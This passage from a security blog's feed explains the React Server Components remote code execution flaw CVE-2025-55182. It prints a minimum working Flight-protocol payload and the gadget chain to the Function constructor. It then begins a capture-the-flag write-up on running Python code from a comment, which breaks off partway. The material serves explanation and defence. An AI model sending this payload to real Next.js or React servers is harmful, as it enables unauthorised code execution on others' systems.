<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">button</span><span style="color:#6CB6FF"> type</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"submit"</span><span style="color:#ADBAC7"> /&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;/</span><span style="color:#8DDB8C">form</span><span style="color:#ADBAC7">&gt;</span></span></code></pre></figure>
<p>At a high level, the client runtime:</p>
<ol>
<li>Intercepts the submit event</li>
<li>Reads the browser's <code>FormData</code> object</li>
<li>Re-encodes that data into Flight chunks (IDs <code>0</code>, <code>1</code>, <code>2</code>, ...) representing the arguments to <code>myServerAction</code></li>
<li>Sends it to the server as a POST targeted at the server-action endpoint (e.g. Next.js’ Next-Action route), with:<!-- -->
<ul>
<li><code>Next-Action: &lt;id&gt;</code> (or <code>rsc-action-id</code>), indicating the ID of the action to call</li>
<li><code>Content-Type: multipart/form-data; boundary=...</code></li>
<li>Parts named <code>0</code>, <code>1</code>, <code>2</code>, ..., whose values are Flight-encoded strings representing the arguments to <code>myServerAction</code>.</li>
</ul>
</li>
</ol>
<p>On the server, Next.js hands the <code>FormData</code> instance straight into React's decoder, which treats the parts as Flight chunks and feeds them through <code>reviveModel</code>.</p>
<p>The exploit makes use of this feature to send a serialized object that eventually results in the server constructing a <code>Function</code> object and calling it.</p>
<h2>The Exploit</h2>
<p>There are now several public PoC exploits circulating online. Lachlan Davidson was the original reporter of the vulnerability, and his PoC is available <a href="https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/01-submitted-poc.js">here</a>.</p>
<p><a href="https://x.com/@maple3142">maple3142</a> was the first to publish a <a href="https://x.com/maple3142/status/1996687157789155647">public exploit</a>, more than 24 hours after the public patch came out.
I've known Maple through the CTF community for a while, and honestly, I'm not surprised that a CTF player was the first to reverse engineer an exploit for this vulnerability.
Many in the community have called this a very CTF-like exploit: it requires diving deep into React internals, understanding the Flight protocol, and some ingenuity (i.e. "hacker mindset") to come up with
a working exploit.</p>
<p>A minimum viable exploit looks like this:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#6CB6FF">  0</span><span style="color:#ADBAC7">: {</span></span>
<span data-line=""><span style="color:#ADBAC7">    status: </span><span style="color:#96D0FF">"resolved_model"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    reason: </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    _response: {</span></span>
<span data-line=""><span style="color:#ADBAC7">      _prefix: </span><span style="color:#96D0FF">"console.log('1337')//"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">      _formData: {</span></span>
<span data-line=""><span style="color:#ADBAC7">        get: </span><span style="color:#96D0FF">"$1:then:constructor"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">      },</span></span>
<span data-line=""><span style="color:#ADBAC7">    },</span></span>
<span data-line=""><span style="color:#ADBAC7">    then: </span><span style="color:#96D0FF">"$1:then"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    value: </span><span style="color:#96D0FF">'{"then":"$B"}'</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">  },</span></span>
<span data-line=""><span style="color:#6CB6FF">  1</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"$@0"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Moritz Sanft gave a great technical breakdown of why this works <a href="https://github.com/msanft/CVE-2025-55182">here</a>, which I highly recommend reading.
I will try to break this down for technical but non-security folks.</p>
<h3>Accessing JavaScript Internals</h3>
<p><a href="https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d">This</a> patch gives us a clue: it adds
<code>hasOwnProperty</code> checks to check whether the key being resolved actually exists on the object that it was accessing.</p>
<p>Prior to this patch, we could access the <code>constructor</code> property of any object:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#6CB6FF">  0</span><span style="color:#ADBAC7">: [</span><span style="color:#96D0FF">"$1:__proto__:constructor:constructor"</span><span style="color:#ADBAC7">]</span></span>
<span data-line=""><span style="color:#6CB6FF">  1</span><span style="color:#ADBAC7">: {</span><span style="color:#96D0FF">"x"</span><span style="color:#ADBAC7">: </span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">},</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>For those unacquainted with JavaScript quirks, the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor"><code>constructor</code></a> property of any <code>Object</code> is a <em>reference</em> to the function that was used to create the object.
Note that this returns a reference to the function <em>itself</em>, not just the function name. This means that going two levels up the prototype chain gives us the constructor of the constructor, i.e. <code>Function</code> itself.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span></span>
<span data-line=""><span style="color:#ADBAC7">[Function: Object]</span></span>
<span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span><span style="color:#ADBAC7">.</span><span style="color:#6CB6FF">constructor</span></span>
<span data-line=""><span style="color:#ADBAC7">[Function: Function]</span></span>
<span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">constructor</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"console.log(1337)"</span><span style="color:#ADBAC7">)()</span></span>
<span data-line=""><span style="color:#6CB6FF">1337</span></span></code></pre></figure>
<h3>Making a Fake Promise</h3>
<p>Now what we need is a gadget to achieve RCE. We want to find some way to call this constructor with a user-controlled argument.</p>
<p>The basic idea behind the public PoCs is that we can make chunk 0 look like a <code>Promise</code> object, and have React treat it as such.
Since JavaScript is a dynamically typed language, there are no guarantees on whether the object is actually a <code>Promise</code> object, or just some other object that happens to have a <code>then</code> property.
Regardless, if something looks like a <code>Promise</code>, then for all intents and purposes, it is a <code>Promise</code>.</p>
<p>In the Flight protocol, the <code>$@</code> syntax tells React that the chunk being referenced is a promise. By using this, we can make React
call the <code>then</code> method of the "promise" object using the <code>await ...then</code> pattern.</p>
<p>Crucially, the internal representation of <code>Chunk</code> objects contains their own <code>then</code> method, which checks the <code>status</code> of the chunk and calls the appropriate handler.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#6CB6FF">Chunk</span><span style="color:#ADBAC7">.</span><span style="color:#6CB6FF">prototype</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">then</span><span style="color:#F47067"> =</span><span style="color:#F47067"> function</span><span style="color:#ADBAC7"> &lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;(</span></span>
<span data-line=""><span style="color:#6CB6FF">  this</span><span style="color:#F47067">:</span><span style="color:#F69D50"> SomeChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;,</span></span>
<span data-line=""><span style="color:#DCBDFB">  resolve</span><span style="color:#F47067">:</span><span style="color:#ADBAC7"> (</span><span style="color:#F69D50">value</span><span style="color:#F47067">:</span><span style="color:#F69D50"> T</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">=&gt;</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#DCBDFB">  reject</span><span style="color:#F47067">:</span><span style="color:#ADBAC7"> (</span><span style="color:#F69D50">reason</span><span style="color:#F47067">:</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">=&gt;</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> chunk</span><span style="color:#F47067">:</span><span style="color:#F69D50"> SomeChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt; </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> this</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#F47067">  switch</span><span style="color:#ADBAC7"> (chunk.status) {</span></span>
<span data-line=""><span style="color:#F47067">    case</span><span style="color:#6CB6FF"> RESOLVED_MODEL</span><span style="color:#ADBAC7">: </span><span style="color:#768390">// "resolved_model"</span></span>
<span data-line=""><span style="color:#DCBDFB">      initializeModelChunk</span><span style="color:#ADBAC7">(chunk);</span></span>
<span data-line=""><span style="color:#F47067">      break</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">  }</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>The key of this exploit is that we can overwrite the <code>.then</code> of chunk 0 with the <code>.then</code> of chunk 1, which is exactly the method above!</p>
<p>Now, this chunk object that looks like a regular <code>Promise</code> is treated as such by React, so it calls the code above and we land in the switch statement.</p>
<p>From here, we can simply set <code>status: "resolved_model"</code> in our chunk object so that we land in the <code>initializeModelChunk</code> function, which is where the magic happens.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">function</span><span style="color:#DCBDFB"> initializeModelChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;(</span><span style="color:#F69D50">chunk</span><span style="color:#F47067">:</span><span style="color:#F69D50"> ResolvedModelChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;)</span><span style="color:#F47067">:</span><span style="color:#6CB6FF"> void</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> rawModel</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> JSON</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">parse</span><span style="color:#ADBAC7">(resolvedModel);</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> value</span><span style="color:#F47067">:</span><span style="color:#F69D50"> T</span><span style="color:#F47067"> =</span><span style="color:#DCBDFB"> reviveModel</span><span style="color:#ADBAC7">(</span></span>
<span data-line=""><span style="color:#ADBAC7">    response,</span></span>
<span data-line=""><span style="color:#ADBAC7">    {</span><span style="color:#96D0FF">''</span><span style="color:#ADBAC7">: rawModel},</span></span>
<span data-line=""><span style="color:#96D0FF">    ''</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    rawModel,</span></span>
<span data-line=""><span style="color:#ADBAC7">    rootReference,</span></span>
<span data-line=""><span style="color:#ADBAC7">  );</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, our <code>.value</code> is parsed as a JSON object and passed to <code>reviveModel</code>, which is a function that recursively deserializes the JSON object into a JavaScript object
by resolving references.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">case</span><span style="color:#96D0FF"> 'B'</span><span style="color:#ADBAC7">: {</span></span>
<span data-line=""><span style="color:#ADBAC7">  const id </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> parseInt</span><span style="color:#ADBAC7">(value.</span><span style="color:#DCBDFB">slice</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">2</span><span style="color:#ADBAC7">), </span><span style="color:#6CB6FF">16</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">  const prefix </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> response._prefix;</span></span>
<span data-line=""><span style="color:#ADBAC7">  const blobKey </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> prefix </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> id;</span></span>
<span data-line=""><span style="color:#ADBAC7">  const backingEntry: Blob </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> (response._formData.</span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(blobKey): any);</span></span>
<span data-line=""><span style="color:#ADBAC7">  return backingEntry;</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, we have our gadget! Since we control the <code>response</code> object, we can simply set <code>_prefix</code> to the contents of our desired function, e.g. <code>console.log('1337')</code>,
and <code>_formdata.get</code> to the <code>Function</code> constructor, so that we construct <code>Function('console.log(1337)')</code>.</p>
<p>This is then returned as the <code>.then</code> of our crafted <code>Promise</code> object, so that when the <code>Promise</code> is resolved by React, our custom function is called.</p>
<h2>The Aftermath</h2>
<h3>WAF Mitigations</h3>
<p>In the days following the vulnerability, major cloud providers and CDNs have implemented WAF mitigations to block exploits. Vercel has introduced a <a href="https://hackerone.com/vercel_platform_protection">public bug bounty</a> for WAF bypasses.</p>
<p>Many have compared this incident to the infamous <a href="https://en.wikipedia.org/wiki/Log4Shell">Log4Shell</a> vulnerability which happened in the same time of year back in 2021.</p>
<p>What makes this vulnerability quite different is that it is much harder to block using naive WAF rules. There are two layers of complexity to unpack here:</p>
<ol>
<li><strong>HTTP parser differentials:</strong> this issue is infamous in the security industry. James Kettle has spent years researching HTTP parser differentials between different web proxies and servers. A number of bypasses we have discovered and
seen in the wild have been due to differences in how WAFs and the Node.js HTTP server + form data parsing libraries parse the HTTP request.</li>
<li><strong>JavaScript internals:</strong> naive blacklisting of certain keywords essentially turns this into a "jail" CTF challenge. You have to be <em>absolutely</em> sure there is no way at all to get to the <code>Function</code> constructor.</li>
</ol>
<h3>Community Response</h3>
<p>There has perhaps never been a better example in recent memory of the power of the security community to respond to critical vulnerabilities that threaten to break the Internet as we know it.</p>
<p>At Hacktron, we've been working closely with Vercel and other security teams to test mitigations and report bypasses. Similar work has been done by other teams, such as <a href="https://www.assetnote.io/">AssetNote</a>.</p>
<p>This incident has also sparked some much-needed debate in the community about the place of human security research in an age of LLM hype.
The complex exploit chain and deep study of React internals required to discover this vulnerability is a perfect example of why LLMs are not a substitute for real human security research right now.</p>
<p>We believe that 90% of security issues are variants of known patterns, but once in a while, we have novel ideas that require a deep understanding of the system being exploited,
and this is where human security research shines. Right now, there is a lot of abstraction and a unique mental model required to come up with such exploits that LLM agents have yet to fully encapsulate.</p>
<p>The Server Functions feature was a relatively new one, and it's not surprising that a lot of its internals were not widely written about and only understood by a small number of people. That's why it took
Lachlan and Maple so much time to discover and exploit it respectively. LLMs can certainly speed things up, but in their current state, I don't think that a fully autonomous agent would have been capable of discovering <em>and</em> exploiting this vulnerability.</p>
<p>This is why we work so closely with the security community at Hacktron. We believe that the human-LLM synergy is not only required in the immediate term, but also would be what keeps us winning in the long run.</p>
<p>As the situation unfolds, we'll be sharing more details about our work.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Executing arbitrary Python code from a comment]]></title>
            <link>https://www.analogue.computer/blog/python-zip-confusion</link>
            <guid>https://www.analogue.computer/blog/python-zip-confusion</guid>
            <pubDate>Mon, 28 Jul 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Can you execute arbitrary Python code from only a comment?</p>
<figure class="mx-auto"><img alt="Challenge" loading="lazy" width="2080" height="620" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fctf_code.9eb3f1ff.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fctf_code.9eb3f1ff.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was the premise of a recent CTF challenge from <a href="https://ctftime.org/event/2640/">UIUCTF 2025</a>
which I found particularly interesting. The challenge was solved by only 11 teams, and I managed to solve it with the help of <a href="https://www.hacktron.ai">Hacktron</a> and a bit of random inspiration at 7AM on a Sunday morning.</p>
<figure class="mx-auto"><img alt="Scan" loading="lazy" width="2101" height="1050" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchall.b64900d9.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchall.b64900d9.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was my first time properly playing a CTF after almost a year in hiatus. This time playing mostly independently without a cracked team like Blue Water, I managed to solve all the web challenges within the first few hours, but got stuck on this one for quite a bit longer. It did make me realise how much I missed the sport, but also how much AI has fundamentally changed the game. After a long night getting stuck on a dead end, I customised a few Hacktron agents to help me out, and lo-and-behold, I solved it 2 hours later:</p>
<figure class="mx-auto"><img alt="Discord Chat" loading="lazy" width="968" height="473" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=2048&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=2048&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<h2>The Challenge</h2>
<p>The challenge itself looks deceptively simple. We connect to a service over the network, which runs the following code:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390">#!/usr/bin/env python3</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> tempfile</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> subprocess</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> os</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">comment </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> input</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"&gt; "</span><span style="color:#ADBAC7">).replace(</span><span style="color:#96D0FF">"</span><span style="color:#F47067">\n</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">).replace(</span><span style="color:#96D0FF">"</span><span style="color:#F47067">\r</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">code </span><span style="color:#F47067">=</span><span style="color:#F47067"> f</span><span style="color:#96D0FF">"""print("hello world!")</span></span>
<span data-line=""><span style="color:#96D0FF"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#96D0FF"># </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">comment</span><span style="color:#F47067">}</span></span>
<span data-line=""><span style="color:#96D0FF">print("Thanks for playing!")"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">with</span><span style="color:#ADBAC7"> tempfile.NamedTemporaryFile(</span><span style="color:#F69D50">mode</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"w"</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">suffix</span><span style="color:#F47067">=</span><span style="color:#96D0FF">".py"</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">delete</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">False</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">as</span><span style="color:#ADBAC7"> f:</span></span>
<span data-line=""><span style="color:#ADBAC7">    f.write(code)</span></span>
<span data-line=""><span style="color:#ADBAC7">    temp_filename </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> f.name</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">    result </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> subprocess.run(</span></span>
<span data-line=""><span style="color:#ADBAC7">        [</span><span style="color:#96D0FF">"python3"</span><span style="color:#ADBAC7">, temp_filename], </span><span style="color:#F69D50">capture_output</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">text</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">timeout</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">5</span></span>
<span data-line=""><span style="color:#ADBAC7">    )</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> result.stdout:</span></span>
<span data-line=""><span style="color:#6CB6FF">        print</span><span style="color:#ADBAC7">(result.stdout, </span><span style="color:#F69D50">end</span><span style="color:#F47067">=</span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> result.stderr:</span></span>
<span data-line=""><span style="color:#6CB6FF">        print</span><span style="color:#ADBAC7">(result.stderr, </span><span style="color:#F69D50">end</span><span style="color:#F47067">=</span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">except</span><span style="color:#ADBAC7"> subprocess.TimeoutExpired:</span></span>
<span data-line=""><span style="color:#6CB6FF">    print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Timeout"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">finally</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">    os.unlink(temp_filename)</span></span></code></pre></figure>
<p>Essentially, a Python file is created with the following content, and we can inject arbitrary content into the comment:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"hello world!"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#768390"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#768390"># &lt;user input&gt;</span></span>
<span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Thanks for playing!"</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>However, since <code>input()</code> only scans for one line, and the CR (<code>\r</code>) and LF (<code>\n</code>) characters are removed anyway, it seems we can only inject a single line of text after the <code>#</code> (i.e. we can't escape out of the comment to write executable code). How can we possibly execute arbitrary code in this context?</p>
<h2>Idea 1: Parser Bugs</h2>
<p><em>BTW this was a dead end, so if you want the actual solution, skip to the next section.</em></p>
<p>I chanced upon <a href="https://github.com/python/cpython/issues/96670">this issue</a> which described a parser bug that was fixed in Python 3.12.0 and 3.11.4. Essentially, lines in the source code could be terminated early by a null byte (since C-strings are null-terminated), which led to unexpected behaviour in the parser.</p>
<figure class="mx-auto"><img alt="CPython Issue" loading="lazy" width="1391" height="1112" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>However, the challenge used a version of Python 3.11 that was not vulnerable to this specific bug. Notably, the fix was originally only introduced in Python 3.12, but was later backported into Python 3.11. The challenge specifically mentioned Python 3.11, so I thought that maybe there were other parser bugs that remained in this version of Python. I wanted to look into the main changes between the parser implementation in Python 3.12 and 3.11, but it was a <strong><em>lot</em></strong> of code to sift through.</p>
<h3>Hacktron to the Rescue</h3>
<p>So I wrote a quick agent based on our Hacktron framework to help me out. It looked something like this (redacted, but you get the idea):</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> ObservedDiff</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">BaseModel</span><span style="color:#ADBAC7">):</span></span>
<span data-line=""><span style="color:#ADBAC7">    old_file: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    old_line: </span><span style="color:#6CB6FF">int</span></span>
<span data-line=""><span style="color:#ADBAC7">    new_file: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    new_line: </span><span style="color:#6CB6FF">int</span></span>
<span data-line=""><span style="color:#ADBAC7">    summary: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    description: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    diff: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""> </span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> ObservedDiffs</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">BaseModel</span><span style="color:#ADBAC7">):</span></span>
<span data-line=""><span style="color:#ADBAC7">    observed_diffs: List[ObservedDiff]</span></span>
<span data-line=""><span style="color:#ADBAC7">    overview: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""> </span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">TASK</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """The old/ folder contains the old version of the codebase.</span></span>
<span data-line=""><span style="color:#96D0FF">The new/ folder contains the new version of the codebase.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">Find the differences between the two versions of the codebase, focusing on the following ONLY:</span></span>
<span data-line=""><span style="color:#96D0FF">- files in the Parser/ folder</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">For each difference, provide an overview of the difference in the description and summary fields.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">Explain clearly what the logical difference is between the two versions of the codebase in the overview field.</span></span>
<span data-line=""><span style="color:#96D0FF">"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">RULES</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """</span></span>
<span data-line=""><span style="color:#96D0FF">&lt;REDACTED&gt;</span></span>
<span data-line=""><span style="color:#96D0FF">"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># ----- Heavily simplified pseudocode -----</span></span>
<span data-line=""><span style="color:#ADBAC7">tools </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> [</span></span>
<span data-line=""><span style="color:#6CB6FF">    ...</span></span>
<span data-line=""><span style="color:#ADBAC7">    MyDiffTool(),</span></span>
<span data-line=""><span style="color:#6CB6FF">    ...</span></span>
<span data-line=""><span style="color:#ADBAC7">]</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">agent </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> MyAgent(</span></span>
<span data-line=""><span style="color:#F69D50">  tools</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">tools,</span></span>
<span data-line=""><span style="color:#F69D50">  structured_output</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">ObservedDiffs,</span></span>
<span data-line=""><span style="color:#F69D50">  task</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">TASK</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">  rules</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">RULES</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">agent.run()</span></span></code></pre></figure>
<p>The overview output was something like this:</p>
<blockquote>
<ol>
<li>
<p><strong>Introduction of New Language Features (Type Parameters and Type Aliases)</strong>:</p>
</li>
</ol>
<ul>
<li>
